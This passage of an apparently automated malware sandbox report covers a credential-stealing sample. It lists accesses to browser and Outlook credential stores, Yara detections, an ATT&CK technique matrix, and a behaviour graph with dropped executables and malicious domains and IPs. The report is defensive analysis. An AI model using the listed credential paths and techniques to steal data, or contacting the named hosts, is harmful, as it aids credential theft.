                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\enus_denylist_encoded_241007.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Generic Stealer
                      Source: Yara matchFile source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR
                      Yara detected Strela Stealer
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      Create Account                      		1
                      Extra Window Memory Injection                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		244
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		11
                      Registry Run Keys / Startup Folder                      		411
                      Process Injection                      		2
                      Software Packing                      		Security Account Manager441
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                      Registry Run Keys / Startup Folder                      		1
                      Timestomp                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets171
                      Virtualization/Sandbox Evasion                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Extra Window Memory Injection                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job171
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632299 Sample: SecuriteInfo.com.FileRepMal... Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 69 verifycleansecurity.com 2->69 71 relay-01-static.com 2->71 73 3 other IPs or domains 2->73 93 Antivirus detection for URL or domain 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 Yara detected Generic Stealer 2->97 99 5 other signatures 2->99 10 SecuriteInfo.com.FileRepMalware.23820.12149.exe 15 7 2->10         started        15 license.exe 2->15         started        17 svchost.exe 1 1 2->17         started        19 hosts.exe 2->19         started        signatures3 process4 dnsIp5 89 verifycleansecurity.com 185.170.144.38, 49714, 80 VDWELLEREE unknown 10->89 59 C:\Users\user\AppData\Roaming\a.exe, PE32 10->59 dropped 61 SecuriteInfo.com.F...23820.12149.exe.log, ASCII 10->61 dropped 113 Bypasses PowerShell execution policy 10->113 115 Reads the Security eventlog 10->115 117 Reads the System eventlog 10->117 21 a.exe 14 5 10->21         started        26 powershell.exe 23 10->26         started        119 Antivirus detection for dropped file 15->119 121 Injects a PE file into a foreign processes 15->121 28 license.exe 15->28         started        91 127.0.0.1 unknown unknown 17->91 file6 signatures7 process8 dnsIp9 83 poolfreshstep.com 185.170.144.39, 49749, 80 VDWELLEREE unknown 21->83 85 fallback-01-static.com 111.90.145.132, 49720, 49748, 7798 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 21->85 57 C:\Users\user\AppData\Local\Tempbehaviorgraphelelx.exe, PE32 21->57 dropped 101 Antivirus detection for dropped file 21->101 103 Multi AV Scanner detection for dropped file 21->103 105 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->105 111 8 other signatures 21->111 30 Gelelx.exe 21->30         started        34 chrome.exe 21->34         started        37 chrome.exe 21->37 injected 39 chrome.exe 21->39 injected 107 Found many strings related to Crypto-Wallets (likely being stolen) 26->107 109 Loading BitLocker PowerShell Module 26->109 41 WmiPrvSE.exe 26->41         started        43 conhost.exe 26->43         started        file10 signatures11 process12 dnsIp13 65 C:\Users\user\AppData\Roaming\license.exe, PE32 30->65 dropped 67 C:\Users\user\AppData\Local\Temp\Vhbyv.exe, PE32+ 30->67 dropped 131 Antivirus detection for dropped file 30->131 133 Multi AV Scanner detection for dropped file 30->133 135 Creates multiple autostart registry keys 30->135 137 2 other signatures 30->137 45 Vhbyv.exe 30->45         started        49 Gelelx.exe 30->49         started        75 192.168.2.4, 443, 49709, 49714 unknown unknown 34->75 51 chrome.exe 34->51         started        file14 signatures15 process16 dnsIp17 63 C:\Users\user\AppData\Roaming\hosts.exe, PE32+ 45->63 dropped 123 Antivirus detection for dropped file 45->123 125 Multi AV Scanner detection for dropped file 45->125 127 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 45->127 129 4 other signatures 45->129 54 Vhbyv.exe 45->54         started        77 plus.l.google.com 142.250.185.110, 443, 49745 GOOGLEUS United States 51->77 79 www.google.com 142.250.186.132, 443, 49725, 49727 GOOGLEUS United States 51->79 81 4 other IPs or domains 51->81 file18 signatures19 process20 dnsIp21 87 relay-01-static.com 196.251.69.16 Web4AfricaZA Seychelles 54->87

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.